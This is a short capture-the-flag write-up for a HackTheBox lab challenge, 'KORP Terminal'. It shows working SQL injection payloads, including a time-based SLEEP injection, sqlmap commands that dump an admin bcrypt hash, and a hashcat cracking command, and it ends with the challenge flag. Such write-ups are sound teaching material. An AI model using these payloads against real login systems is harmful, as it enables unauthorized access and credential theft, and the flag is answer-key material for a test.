KORP Terminal

Personal Rating: Medium

The website shows this terminal

Username and Password are sent as POST requests, which you can see if you inspect the source code.

Interestingly, clicking on either of the two buttons generates the exact same web request.

Now we know that the server uses Python Werkzeug in the background.

I tested sqlmap on the request with POST, GET and OPTIONS method, which did not work

Running an active scan with ZAProxy, one request returned an error. The request has this body: username=c%3A%5C&password=test2

This is the error:

This indicates that an SQL injection might be possible

With that knowledge I started sqlmap again and tweaked it accordingly in the hope to find a simple injection. I did not bother beiing stealthy:

sqlmap -r '/HTBfolder/CTF-2024-HTB/KORP Terminal/KORPTerminal.req' --dbms mariadb --level 5 --risk 3 -a

This did not work

Running a Burp Fuzz I found some chars that provoke an internal server error:

This payload:

username=admin+OR+1==1')&password=test

returns an interesting error that might indicate that we escaped some input sanitization:

"1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ')'' at line 1"

This command worked to dump the admin hash:

sqlmap --dbms mariadb --level 5 --risk 3 -r request.txt --ignore-code=* -D korp_terminal -a

This one works manually for the username:

' AND (SELECT 1234 FROM (SELECT(SLEEP(10)))asd)-- we

$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.

hashcat -a 0 -m 3200 '$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.' /usr/share/seclists/Passwords/rockyou.txt

HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}